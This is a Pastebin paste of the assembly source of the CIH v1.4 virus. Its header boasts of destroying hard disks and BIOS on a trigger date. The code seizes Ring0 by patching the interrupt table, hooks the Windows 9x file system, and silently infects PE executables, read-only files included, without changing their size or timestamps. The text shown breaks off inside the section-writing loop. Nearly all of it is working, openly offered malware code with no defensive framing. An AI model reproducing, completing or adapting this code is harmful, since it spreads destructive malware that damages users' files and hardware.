FlyFar

CIH v1.4/CIH.1019 Virus Source Code

Jan 15th, 2023 (edited)
174
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 36.53 KB | Cybersecurity | 0 0
  1. ; ****************************************************************************
  2. ; * The Virus Program Information *
  3. ; ****************************************************************************
  4. ; * *
  5. ; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
  6. ; * Create Date : 04/26/1998 Now Version : 1.4 *
  7. ; * Modification Time : 05/31/1998 *
  8. ; * *
  9. ; * Turbo Assembler Version 4.0 : tasm /m cih *
  10. ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
  11. ; * *
  12. ; *==========================================================================*
  13. ; * Modification History *
  14. ; *==========================================================================*
  15. ; * v1.0 1. Create the Virus Program. *
  16. ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
  17. ; * 04/26/1998 3. Virus Code doesn't Reload into System. *
  18. ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
  19. ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
  20. ; * 6. When System Opens Existing PE File, the File will be *
  21. ; * Infected, and the File doesn't be Reinfected. *
  22. ; * 7. It is also Infected, even the File is Read-Only. *
  23. ; * 8. When the File is Infected, the Modification Date and Time *
  24. ; * of the File also don't be Changed. *
  25. ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
  26. ; * Previous FileSystemApiHook, it will Call the Function *
  27. ; * that the IFS Manager Would Normally Call to Implement *
  28. ; * this Particular I/O Request. *
  29. ; * 10. The Virus Size is only 656 Bytes. *
  30. ; *==========================================================================*
  31. ; * v1.1 1. Especially, the File that be Infected will not Increase *
  32. ; * it's Size... ^__^ *
  33. ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
  34. ; * When Exception Error Occurs, Our OS System should be in *
  35. ; * Windows NT. So My Cute Virus will not Continue to Run, *
  36. ; * it will Jmup to Original Application to Run. *
  37. ; * 3. Use Better Algorithm, Reduce Virus Code Size. *
  38. ; * 4. The Virus "Basic" Size is only 796 Bytes. *
  39. ; *==========================================================================*
  40. ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
  41. ; * 2. Modify the Bug of v1.1 *
  42. ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
  43. ; *==========================================================================*
  44. ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
  45. ; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
  46. ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
  47. ; *==========================================================================*
  48. ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
  49. ; * 2. Change the Date of Killing Computers. *
  50. ; * 05/31/1998 3. Modify Virus Version Copyright. *
  51. ; * 4. The Virus "Basic" Size is 1019 Bytes. *
  52. ; ****************************************************************************
  53.  
  54. .586P
  55.  
  56. ; ****************************************************************************
  57. ; * Original PE Executable File(Don't Modify this Section) *
  58. ; ****************************************************************************
  59.  
  60. OriginalAppEXE SEGMENT
  61.  
  62. FileHeader:
  63. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
  64. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
  65. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  66. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  67. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  68. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  69. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  70. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
  71. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
  72. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
  73. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
  74. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
  75. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
  76. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
  77. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
  78. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  79. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
  80. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
  81. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
  82. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
  83. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  84. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  85. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
  86. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  87. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  88. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  89. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
  90. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
  91. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  92. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  93. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
  94. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  95. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  96. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  97. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  98. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  99. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  100. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  101. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  102. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  103. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  104. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  105. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  106. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  107. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  108. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  109. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  110. db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
  111. db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  112. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  113. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  114. db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
  115. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  116. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  117. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  118. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  119. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  120. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  121. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  122. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  123. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  124. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  125. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  126. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  127. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  128. dd 00000000h, VirusSize
  129.  
  130. OriginalAppEXE ENDS
  131.  
  132. ; ****************************************************************************
  133. ; * My Virus Game *
  134. ; ****************************************************************************
  135.  
  136. ; *********************************************************
  137. ; * Constant Define *
  138. ; *********************************************************
  139.  
  140. TRUE = 1
  141. FALSE = 0
  142.  
  143. DEBUG = TRUE
  144.  
  145. MajorVirusVersion = 1
  146. MinorVirusVersion = 4
  147.  
  148. VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
  149.  
  150.  
  151. IF DEBUG
  152.  
  153. FirstKillHardDiskNumber = 81h
  154. HookExceptionNumber = 05h
  155.  
  156. ELSE
  157.  
  158. FirstKillHardDiskNumber = 80h
  159. HookExceptionNumber = 03h
  160.  
  161. ENDIF
  162.  
  163.  
  164. FileNameBufferSize = 7fh
  165.  
  166. ; *********************************************************
  167. ; *********************************************************
  168.  
  169. VirusGame SEGMENT
  170.  
  171. ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
  172. ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
  173.  
  174. ; *********************************************************
  175. ; * Ring3 Virus Game Initial Program *
  176. ; *********************************************************
  177.  
  178. MyVirusStart:
  179. push ebp
  180.  
  181. ; *************************************
  182. ; * Let's Modify Structured Exception *
  183. ; * Handing, Prevent Exception Error *
  184. ; * Occurrence, Especially in NT. *
  185. ; *************************************
  186.  
  187. lea eax, [esp-04h*2]
  188.  
  189. xor ebx, ebx
  190. xchg eax, fs:[ebx]
  191.  
  192. call @0
  193. @0:
  194. pop ebx
  195.  
  196. lea ecx, StopToRunVirusCode-@0[ebx]
  197. push ecx
  198.  
  199. push eax
  200.  
  201. ; *************************************
  202. ; * Let's Modify *
  203. ; * IDT(Interrupt Descriptor Table) *
  204. ; * to Get Ring0 Privilege... *
  205. ; *************************************
  206.  
  207. push eax ;
  208. sidt [esp-02h] ; Get IDT Base Address
  209. pop ebx ;
  210.  
  211. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  212.  
  213. cli
  214.  
  215. mov ebp, [ebx] ; Get Exception Base
  216. mov bp, [ebx-04h] ; Entry Point
  217.  
  218. lea esi, MyExceptionHook-@1[ecx]
  219.  
  220. push esi
  221.  
  222. mov [ebx-04h], si ;
  223. shr esi, 16 ; Modify Exception
  224. mov [ebx+02h], si ; Entry Point Address
  225.  
  226. pop esi
  227.  
  228. ; *************************************
  229. ; * Generate Exception to Get Ring0 *
  230. ; *************************************
  231.  
  232. int HookExceptionNumber ; GenerateException
  233. ReturnAddressOfEndException = $
  234.  
  235. ; *************************************
  236. ; * Merge All Virus Code Section *
  237. ; *************************************
  238.  
  239. push esi
  240. mov esi, eax
  241.  
  242. LoopOfMergeAllVirusCodeSection:
  243.  
  244. mov ecx, [eax-04h]
  245.  
  246. rep movsb
  247.  
  248. sub eax, 08h
  249.  
  250. mov esi, [eax]
  251.  
  252. or esi, esi
  253. jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  254.  
  255. jmp LoopOfMergeAllVirusCodeSection
  256.  
  257. QuitLoopOfMergeAllVirusCodeSection:
  258.  
  259. pop esi
  260.  
  261. ; *************************************
  262. ; * Generate Exception Again *
  263. ; *************************************
  264.  
  265. int HookExceptionNumber ; GenerateException Again
  266.  
  267. ; *************************************
  268. ; * Let's Restore *
  269. ; * Structured Exception Handing *
  270. ; *************************************
  271.  
  272. ReadyRestoreSE:
  273. sti
  274.  
  275. xor ebx, ebx
  276.  
  277. jmp RestoreSE
  278.  
  279. ; *************************************
  280. ; * When Exception Error Occurs, *
  281. ; * Our OS System should be in NT. *
  282. ; * So My Cute Virus will not *
  283. ; * Continue to Run, it Jmups to *
  284. ; * Original Application to Run. *
  285. ; *************************************
  286.  
  287. StopToRunVirusCode:
  288. @1 = StopToRunVirusCode
  289.  
  290. xor ebx, ebx
  291. mov eax, fs:[ebx]
  292. mov esp, [eax]
  293.  
  294. RestoreSE:
  295. pop dword ptr fs:[ebx]
  296. pop eax
  297.  
  298. ; *************************************
  299. ; * Return Original App to Execute *
  300. ; *************************************
  301.  
  302. pop ebp
  303.  
  304. push 00401000h ; Push Original
  305. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
  306.  
  307. ret ; Return to Original App Entry Point
  308.  
  309. ; *********************************************************
  310. ; * Ring0 Virus Game Initial Program *
  311. ; *********************************************************
  312.  
  313. MyExceptionHook:
  314. @2 = MyExceptionHook
  315.  
  316. jz InstallMyFileSystemApiHook
  317.  
  318. ; *************************************
  319. ; * Do My Virus Exist in System !? *
  320. ; *************************************
  321.  
  322. mov ecx, dr0
  323. jecxz AllocateSystemMemoryPage
  324.  
  325. add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
  326.  
  327. ; *************************************
  328. ; * Return to Ring3 Initial Program *
  329. ; *************************************
  330.  
  331. ExitRing0Init:
  332. mov [ebx-04h], bp ;
  333. shr ebp, 16 ; Restore Exception
  334. mov [ebx+02h], bp ;
  335.  
  336. iretd
  337.  
  338. ; *************************************
  339. ; * Allocate SystemMemory Page to Use *
  340. ; *************************************
  341.  
  342. AllocateSystemMemoryPage:
  343.  
  344. mov dr0, ebx ; Set the Mark of My Virus Exist in System
  345.  
  346. push 00000000fh ;
  347. push ecx ;
  348. push 0ffffffffh ;
  349. push ecx ;
  350. push ecx ;
  351. push ecx ;
  352. push 000000001h ;
  353. push 000000002h ;
  354. int 20h ; VMMCALL _PageAllocate
  355. _PageAllocate = $ ;
  356. dd 00010053h ; Use EAX, ECX, EDX, and flags
  357. add esp, 08h*04h
  358.  
  359. xchg edi, eax ; EDI = SystemMemory Start Address
  360.  
  361. lea eax, MyVirusStart-@2[esi]
  362.  
  363. iretd ; Return to Ring3 Initial Program
  364.  
  365. ; *************************************
  366. ; * Install My File System Api Hook *
  367. ; *************************************
  368.  
  369. InstallMyFileSystemApiHook:
  370.  
  371. lea eax, FileSystemApiHook-@6[edi]
  372.  
  373. push eax ;
  374. int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
  375. IFSMgr_InstallFileSystemApiHook = $ ;
  376. dd 00400067h ; Use EAX, ECX, EDX, and flags
  377.  
  378. mov dr0, eax ; Save OldFileSystemApiHook Address
  379.  
  380. pop eax ; EAX = FileSystemApiHook Address
  381.  
  382. ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
  383. mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
  384. mov edx, [ecx]
  385. mov OldInstallFileSystemApiHook-@3[eax], edx
  386.  
  387. ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
  388. lea eax, InstallFileSystemApiHook-@3[eax]
  389. mov [ecx], eax
  390.  
  391. cli
  392.  
  393. jmp ExitRing0Init
  394.  
  395. ; *********************************************************
  396. ; * Code Size of Merge Virus Code Section *
  397. ; *********************************************************
  398.  
  399. CodeSizeOfMergeVirusCodeSection = offset $
  400.  
  401. ; *********************************************************
  402. ; * IFSMgr_InstallFileSystemApiHook *
  403. ; *********************************************************
  404.  
  405. InstallFileSystemApiHook:
  406. push ebx
  407.  
  408. call @4 ;
  409. @4: ;
  410. pop ebx ; mov ebx, offset FileSystemApiHook
  411. add ebx, FileSystemApiHook-@4 ;
  412.  
  413. push ebx
  414. int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
  415. IFSMgr_RemoveFileSystemApiHook = $
  416. dd 00400068h ; Use EAX, ECX, EDX, and flags
  417. pop eax
  418.  
  419. ; Call Original IFSMgr_InstallFileSystemApiHook
  420. ; to Link Client FileSystemApiHook
  421. push dword ptr [esp+8]
  422. call OldInstallFileSystemApiHook-@3[ebx]
  423. pop ecx
  424.  
  425. push eax
  426.  
  427. ; Call Original IFSMgr_InstallFileSystemApiHook
  428. ; to Link My FileSystemApiHook
  429. push ebx
  430. call OldInstallFileSystemApiHook-@3[ebx]
  431. pop ecx
  432.  
  433. mov dr0, eax ; Adjust OldFileSystemApiHook Address
  434.  
  435. pop eax
  436.  
  437. pop ebx
  438.  
  439. ret
  440.  
  441. ; *********************************************************
  442. ; * Static Data *
  443. ; *********************************************************
  444.  
  445. OldInstallFileSystemApiHook dd ?
  446.  
  447. ; *********************************************************
  448. ; * IFSMgr_FileSystemHook *
  449. ; *********************************************************
  450.  
  451. ; *************************************
  452. ; * IFSMgr_FileSystemHook Entry Point *
  453. ; *************************************
  454.  
  455. FileSystemApiHook:
  456. @3 = FileSystemApiHook
  457.  
  458. pushad
  459.  
  460. call @5 ;
  461. @5: ;
  462. pop esi ; mov esi, offset VirusGameDataStartAddress
  463. add esi, VirusGameDataStartAddress-@5
  464.  
  465. ; *************************************
  466. ; * Is OnBusy !? *
  467. ; *************************************
  468.  
  469. test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
  470. jnz pIFSFunc ; goto pIFSFunc
  471.  
  472. ; *************************************
  473. ; * Is OpenFile !? *
  474. ; *************************************
  475.  
  476. ; if ( NotOpenFile )
  477. ; goto prevhook
  478. lea ebx, [esp+20h+04h+04h]
  479. cmp dword ptr [ebx], 00000024h
  480. jne prevhook
  481.  
  482. ; *************************************
  483. ; * Enable OnBusy *
  484. ; *************************************
  485.  
  486. inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
  487.  
  488. ; *************************************
  489. ; * Get FilePath's DriveNumber, *
  490. ; * then Set the DriveName to *
  491. ; * FileNameBuffer. *
  492. ; *************************************
  493. ; * Ex. If DriveNumber is 03h, *
  494. ; * DriveName is 'C:'. *
  495. ; *************************************
  496.  
  497. ; mov esi, offset FileNameBuffer
  498. add esi, FileNameBuffer-@6
  499.  
  500. push esi
  501.  
  502. mov al, [ebx+04h]
  503. cmp al, 0ffh
  504. je CallUniToBCSPath
  505.  
  506. add al, 40h
  507. mov ah, ':'
  508.  
  509. mov [esi], eax
  510.  
  511. inc esi
  512. inc esi
  513.  
  514. ; *************************************
  515. ; * UniToBCSPath *
  516. ; *************************************
  517. ; * This Service Converts *
  518. ; * a Canonicalized Unicode Pathname *
  519. ; * to a Normal Pathname in the *
  520. ; * Specified BCS Character Set. *
  521. ; *************************************
  522.  
  523. CallUniToBCSPath:
  524. push 00000000h
  525. push FileNameBufferSize
  526. mov ebx, [ebx+10h]
  527. mov eax, [ebx+0ch]
  528. add eax, 04h
  529. push eax
  530. push esi
  531. int 20h ; VXDCall UniToBCSPath
  532. UniToBCSPath = $
  533. dd 00400041h
  534. add esp, 04h*04h
  535.  
  536. ; *************************************
  537. ; * Is FileName '.EXE' !? *
  538. ; *************************************
  539.  
  540. ; cmp [esi+eax-04h], '.EXE'
  541. cmp [esi+eax-04h], 'EXE.'
  542. pop esi
  543. jne DisableOnBusy
  544.  
  545. IF DEBUG
  546.  
  547. ; *************************************
  548. ; * Only for Debug *
  549. ; *************************************
  550.  
  551. ; cmp [esi+eax-06h], 'FUCK'
  552. cmp [esi+eax-06h], 'KCUF'
  553. jne DisableOnBusy
  554.  
  555. ENDIF
  556.  
  557. ; *************************************
  558. ; * Is Open Existing File !? *
  559. ; *************************************
  560.  
  561. ; if ( NotOpenExistingFile )
  562. ; goto DisableOnBusy
  563. cmp word ptr [ebx+18h], 01h
  564. jne DisableOnBusy
  565.  
  566. ; *************************************
  567. ; * Get Attributes of the File *
  568. ; *************************************
  569.  
  570. mov ax, 4300h
  571. int 20h ; VXDCall IFSMgr_Ring0_FileIO
  572. IFSMgr_Ring0_FileIO = $
  573. dd 00400032h
  574.  
  575. jc DisableOnBusy
  576.  
  577. push ecx
  578.  
  579. ; *************************************
  580. ; * Get IFSMgr_Ring0_FileIO Address *
  581. ; *************************************
  582.  
  583. mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
  584. mov edi, [edi]
  585.  
  586. ; *************************************
  587. ; * Is Read-Only File !? *
  588. ; *************************************
  589.  
  590. test cl, 01h
  591. jz OpenFile
  592.  
  593. ; *************************************
  594. ; * Modify Read-Only File to Write *
  595. ; *************************************
  596.  
  597. mov ax, 4301h
  598. xor ecx, ecx
  599. call edi ; VXDCall IFSMgr_Ring0_FileIO
  600.  
  601. ; *************************************
  602. ; * Open File *
  603. ; *************************************
  604.  
  605. OpenFile:
  606. xor eax, eax
  607. mov ah, 0d5h
  608. xor ecx, ecx
  609. xor edx, edx
  610. inc edx
  611. mov ebx, edx
  612. inc ebx
  613. call edi ; VXDCall IFSMgr_Ring0_FileIO
  614.  
  615. xchg ebx, eax ; mov ebx, FileHandle
  616.  
  617. ; *************************************
  618. ; * Need to Restore *
  619. ; * Attributes of the File !? *
  620. ; *************************************
  621.  
  622. pop ecx
  623.  
  624. pushf
  625.  
  626. test cl, 01h
  627. jz IsOpenFileOK
  628.  
  629. ; *************************************
  630. ; * Restore Attributes of the File *
  631. ; *************************************
  632.  
  633. mov ax, 4301h
  634. call edi ; VXDCall IFSMgr_Ring0_FileIO
  635.  
  636. ; *************************************
  637. ; * Is Open File OK !? *
  638. ; *************************************
  639.  
  640. IsOpenFileOK:
  641. popf
  642.  
  643. jc DisableOnBusy
  644.  
  645. ; *************************************
  646. ; * Open File Already Succeed. ^__^ *
  647. ; *************************************
  648.  
  649. push esi ; Push FileNameBuffer Address to Stack
  650.  
  651. pushf ; Now CF = 0, Push Flag to Stack
  652.  
  653. add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
  654.  
  655. ; ***************************
  656. ; * Get OffsetToNewHeader *
  657. ; ***************************
  658.  
  659. xor eax, eax
  660. mov ah, 0d6h
  661.  
  662. ; For Doing Minimal VirusCode's Length,
  663. ; I Save EAX to EBP.
  664. mov ebp, eax
  665.  
  666. push 00000004h
  667. pop ecx
  668. push 0000003ch
  669. pop edx
  670. call edi ; VXDCall IFSMgr_Ring0_FileIO
  671.  
  672. mov edx, [esi]
  673.  
  674. ; ***************************
  675. ; * Get 'PE\0' Signature *
  676. ; * of ImageFileHeader, and *
  677. ; * Infected Mark. *
  678. ; ***************************
  679.  
  680. dec edx
  681.  
  682. mov eax, ebp
  683. call edi ; VXDCall IFSMgr_Ring0_FileIO
  684.  
  685. ; ***************************
  686. ; * Is PE !? *
  687. ; ***************************
  688. ; * Is the File *
  689. ; * Already Infected !? *
  690. ; ***************************
  691. ; * WinZip Self-Extractor *
  692. ; * doesn't Have Infected *
  693. ; * Mark Because My Virus *
  694. ; * doesn't Infect it. *
  695. ; ***************************
  696.  
  697. ; cmp [esi], '\0PE\0'
  698. cmp dword ptr [esi], 00455000h
  699. jne CloseFile
  700.  
  701. ; *************************************
  702. ; * The File is ^o^ *
  703. ; * PE(Portable Executable) indeed. *
  704. ; *************************************
  705. ; * The File isn't also Infected. *
  706. ; *************************************
  707.  
  708. ; *************************************
  709. ; * Start to Infect the File *
  710. ; *************************************
  711. ; * Registers Use Status Now : *
  712. ; * *
  713. ; * EAX = 04h *
  714. ; * EBX = File Handle *
  715. ; * ECX = 04h *
  716. ; * EDX = 'PE\0\0' Signature of *
  717. ; * ImageFileHeader Pointer's *
  718. ; * Former Byte. *
  719. ; * ESI = DataBuffer Address ==> @8 *
  720. ; * EDI = IFSMgr_Ring0_FileIO Address *
  721. ; * EBP = D600h ==> Read Data in File *
  722. ; *************************************
  723. ; * Stack Dump : *
  724. ; * *
  725. ; * ESP => ------------------------- *
  726. ; * | EFLAG(CF=0) | *
  727. ; * ------------------------- *
  728. ; * | FileNameBufferPointer | *
  729. ; * ------------------------- *
  730. ; * | EDI | *
  731. ; * ------------------------- *
  732. ; * | ESI | *
  733. ; * ------------------------- *
  734. ; * | EBP | *
  735. ; * ------------------------- *
  736. ; * | ESP | *
  737. ; * ------------------------- *
  738. ; * | EBX | *
  739. ; * ------------------------- *
  740. ; * | EDX | *
  741. ; * ------------------------- *
  742. ; * | ECX | *
  743. ; * ------------------------- *
  744. ; * | EAX | *
  745. ; * ------------------------- *
  746. ; * | Return Address | *
  747. ; * ------------------------- *
  748. ; *************************************
  749.  
  750. push ebx ; Save File Handle
  751.  
  752. push 00h ; Set VirusCodeSectionTableEndMark
  753.  
  754. ; ***************************
  755. ; * Let's Set the *
  756. ; * Virus' Infected Mark *
  757. ; ***************************
  758.  
  759. push 01h ; Size
  760. push edx ; Pointer of File
  761. push edi ; Address of Buffer
  762.  
  763. ; ***************************
  764. ; * Save ESP Register *
  765. ; ***************************
  766.  
  767. mov dr1, esp
  768.  
  769. ; ***************************
  770. ; * Let's Set the *
  771. ; * NewAddressOfEntryPoint *
  772. ; * ( Only First Set Size ) *
  773. ; ***************************
  774.  
  775. push eax ; Size
  776.  
  777. ; ***************************
  778. ; * Let's Read *
  779. ; * Image Header in File *
  780. ; ***************************
  781.  
  782. mov eax, ebp
  783. mov cl, SizeOfImageHeaderToRead
  784. add edx, 07h ; Move EDX to NumberOfSections
  785. call edi ; VXDCall IFSMgr_Ring0_FileIO
  786.  
  787. ; ***************************
  788. ; * Let's Set the *
  789. ; * NewAddressOfEntryPoint *
  790. ; * ( Set Pointer of File, *
  791. ; * Address of Buffer ) *
  792. ; ***************************
  793.  
  794. lea eax, (AddressOfEntryPoint-@8)[edx]
  795. push eax ; Pointer of File
  796.  
  797. lea eax, (NewAddressOfEntryPoint-@8)[esi]
  798. push eax ; Address of Buffer
  799.  
  800. ; ***************************
  801. ; * Move EDX to the Start *
  802. ; * of SectionTable in File *
  803. ; ***************************
  804.  
  805. movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
  806. lea edx, [eax+edx+12h]
  807.  
  808. ; ***************************
  809. ; * Let's Get *
  810. ; * Total Size of Sections *
  811. ; ***************************
  812.  
  813. mov al, SizeOfScetionTable
  814.  
  815. ; I Assume NumberOfSections <= 0ffh
  816. mov cl, (NumberOfSections-@8)[esi]
  817.  
  818. mul cl
  819.  
  820. ; ***************************
  821. ; * Let's Set Section Table *
  822. ; ***************************
  823.  
  824. ; Move ESI to the Start of SectionTable
  825. lea esi, (StartOfSectionTable-@8)[esi]
  826.  
  827. push eax ; Size
  828. push edx ; Pointer of File
  829. push esi ; Address of Buffer
  830.  
  831. ; ***************************
  832. ; * The Code Size of Merge *
  833. ; * Virus Code Section and *
  834. ; * Total Size of Virus *
  835. ; * Code Section Table Must *
  836. ; * be Small or Equal the *
  837. ; * Unused Space Size of *
  838. ; * Following Section Table *
  839. ; ***************************
  840.  
  841. inc ecx
  842. push ecx ; Save NumberOfSections+1
  843.  
  844. shl ecx, 03h
  845. push ecx ; Save TotalSizeOfVirusCodeSectionTable
  846.  
  847. add ecx, eax
  848. add ecx, edx
  849.  
  850. sub ecx, (SizeOfHeaders-@9)[esi]
  851. not ecx
  852. inc ecx
  853.  
  854. ; Save My Virus First Section Code
  855. ; Size of Following Section Table...
  856. ; ( Not Include the Size of Virus Code Section Table )
  857. push ecx
  858.  
  859. xchg ecx, eax ; ECX = Size of Section Table
  860.  
  861. ; Save Original Address of Entry Point
  862. mov eax, (AddressOfEntryPoint-@9)[esi]
  863. add eax, (ImageBase-@9)[esi]
  864. mov (OriginalAddressOfEntryPoint-@9)[esi], eax
  865.  
  866. cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
  867. jl OnlySetInfectedMark
  868.  
  869. ; ***************************
  870. ; * Read All Section Tables *
  871. ; ***************************
  872.  
  873. mov eax, ebp
  874. call edi ; VXDCall IFSMgr_Ring0_FileIO
  875.  
  876. ; ***************************
  877. ; * Full Modify the Bug : *
  878. ; * WinZip Self-Extractor *
  879. ; * Occurs Error... *
  880. ; ***************************
  881. ; * So When User Opens *
  882. ; * WinZip Self-Extractor, *
  883. ; * Virus Doesn't Infect it.*
  884. ; ***************************
  885. ; * First, Virus Gets the *
  886. ; * PointerToRawData in the *
  887. ; * Second Section Table, *
  888. ; * Reads the Section Data, *
  889. ; * and Tests the String of *
  890. ; * 'WinZip(R)'...... *
  891. ; ***************************
  892.  
  893. xchg eax, ebp
  894.  
  895. push 00000004h
  896. pop ecx
  897.  
  898. push edx
  899. mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
  900. add edx, 12h
  901.  
  902. call edi ; VXDCall IFSMgr_Ring0_FileIO
  903.  
  904. ; cmp [esi], 'nZip'
  905. cmp dword ptr [esi], 'piZn'
  906. je NotSetInfectedMark
  907.  
  908. pop edx
  909.  
  910. ; ***************************
  911. ; * Let's Set Total Virus *
  912. ; * Code Section Table *
  913. ; ***************************
  914.  
  915. ; EBX = My Virus First Section Code
  916. ; Size of Following Section Table
  917. pop ebx
  918. pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
  919. pop ecx ; ECX = NumberOfSections+1
  920.  
  921. push edi ; Size
  922.  
  923. add edx, ebp
  924. push edx ; Pointer of File
  925.  
  926. add ebp, esi
  927. push ebp ; Address of Buffer
  928.  
  929. ; ***************************
  930. ; * Set the First Virus *
  931. ; * Code Section Size in *
  932. ; * VirusCodeSectionTable *
  933. ; ***************************
  934.  
  935. lea eax, [ebp+edi-04h]
  936. mov [eax], ebx
  937.  
  938. ; ***************************
  939. ; * Let's Set My Virus *
  940. ; * First Section Code *
  941. ; ***************************
  942.  
  943. push ebx ; Size
  944.  
  945. add edx, edi
  946. push edx ; Pointer of File
  947.  
  948. lea edi, (MyVirusStart-@9)[esi]
  949. push edi ; Address of Buffer
  950.  
  951. ; ***************************
  952. ; * Let's Modify the *
  953. ; * AddressOfEntryPoint to *
  954. ; * My Virus Entry Point *
  955. ; ***************************
  956.  
  957. mov (NewAddressOfEntryPoint-@9)[esi], edx
  958.  
  959. ; ***************************
  960. ; * Setup Initial Data *
  961. ; ***************************
  962.  
  963. lea edx, [esi-SizeOfScetionTable]
  964. mov ebp, offset VirusSize
  965.  
  966. jmp StartToWriteCodeToSections
  967.  
  968. ; ***************************
  969. ; * Write Code to Sections *
  970. ; ***************************
  971.  
  972. LoopOfWriteCodeToSections:
  973.  
  974. add edx, SizeOfScetionTable
  975.  
  976. mov ebx, (SizeOfRawData-@9)[edx]
  977. sub ebx, (VirtualSize-@9)[edx]
